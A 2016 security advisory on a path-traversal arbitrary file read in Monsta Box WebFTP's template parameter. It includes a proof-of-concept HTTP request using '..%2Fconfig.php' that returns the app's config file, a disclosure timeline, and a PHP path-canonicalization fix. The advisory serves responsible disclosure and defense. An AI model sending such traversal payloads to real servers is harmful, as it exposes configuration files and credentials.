Monsta Box WebFTP Arbitrary File Read

Date: 08 Apr 2016 00:00:00. Reported by: Imre Rad. Type: packetstorm. Source: packetstormsecurity.com

The Monsta Box WebFTP Arbitrary File Read vulnerability in the template parameter allows arbitrary file access.

Code
`Application  
-----------  
"MONSTA Box is a lightweight open-source file manager you can install on  
your website or server * to easily manage your files through any browser."  
(Description from the official website http://www.monstahq.com/)  
  
  
Vulnerability  
-------------  
The Monsta Box WebFTP application supports file templates when creating  
new files. The template parameter is part of the HTTP request, so it is  
user input, and it was not sanitized correctly. By sending an HTTP request  
with a modified template parameter it was possible to traverse out of the  
template directory and read arbitrary files (in the context of the Monsta  
Box WebFTP application).  
  
  
PoC  
---  
A proof of concept request/response to read the config.php file of the  
Monsta Box installation (note the template parameter of the HTTP request):  
  
POST /? HTTP/1.1  
Host: somehost  
Referer: http://somereferer/  
Content-Length: 352  
Cookie: PHPSESSID=somecookie  
  
  
&ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913  
  
HTTP/1.1 200 OK  
Server: nginx  
Date: Sun, 27 Mar 2016 19:34:21 GMT  
Content-Type: text/html  
Transfer-Encoding: chunked  
Connection: keep-alive  
X-Frame-Options: SAMEORIGIN  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
  
1cac  
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:  
60px; width: 1030px;"><div id="popupHeaderAction">Editing:  
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input  
type="hidden" name="file" value="~/xxx"><textarea name="editContent"  
id="editContent" style="height: 608px;"><?php  
  
# Open README file for descriptions and help.  
  
$ftpHost = "somehost";  
$ftpPort = "21";  
  
...  
  
  
Affected versions  
-----------------  
The above vulnerability was fixed in version 1.8.3. Older versions of  
Monsta Box with template support are vulnerable.  
  
  
Timeline  
--------  
2016-03-29: Vendor contacted for appropriate contact person to report to  
2016-03-30: Vulnerability was reported  
2016-03-31: Fixed version was published  
2016-04-07: Public disclosure  
  
  
Discovered by  
-------------  
Imre RAD  
www.search-lab.hu  
www.scademy.com  
  
  
  
`
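
One way to close this class of bug is to canonicalize the requested template path and confirm it still lies inside the template directory before reading it. The following is an added example, not Monsta Box code and not the vendor's 1.8.3 fix; the function name `resolveTemplate`, the `templates/` directory layout and the sample files are assumptions constructed for illustration.

```php
<?php
// Added example; not Monsta Box code. Names and directory layout are assumptions.

/**
 * Resolve a user-supplied template name to a file inside $templateDir.
 * Returns the canonical path, or null if it is missing or escapes the directory.
 */
function resolveTemplate(string $templateDir, string $name): ?string
{
    $base = realpath($templateDir);
    if ($base === false || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // realpath() collapses ../ sequences and follows symlinks; false if missing.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Compare canonical paths with a trailing separator, so a sibling such as
    // /app/templates-old does not pass as being under /app/templates.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed layout: <tmp>/app/config.php and <tmp>/app/templates/html.txt
$app = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
mkdir($app . '/templates', 0700, true);
file_put_contents($app . '/config.php', '<?php $ftpHost = "constructed";');
file_put_contents($app . '/templates/html.txt', '<html></html>');

// PHP URL-decodes POST fields, so ..%2Fconfig.php arrives here as ../config.php.
foreach (['html.txt', '../config.php', 'missing.txt', '..'] as $name) {
    $resolved = resolveTemplate($app . '/templates', $name);
    printf("%-14s => %s\n", $name, $resolved === null ? 'rejected' : 'allowed');
}

// Remove the constructed files.
unlink($app . '/templates/html.txt');
unlink($app . '/config.php');
rmdir($app . '/templates');
rmdir($app);
```

Only `html.txt` is allowed; the traversal value from the PoC resolves to a path outside the template directory and is rejected.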
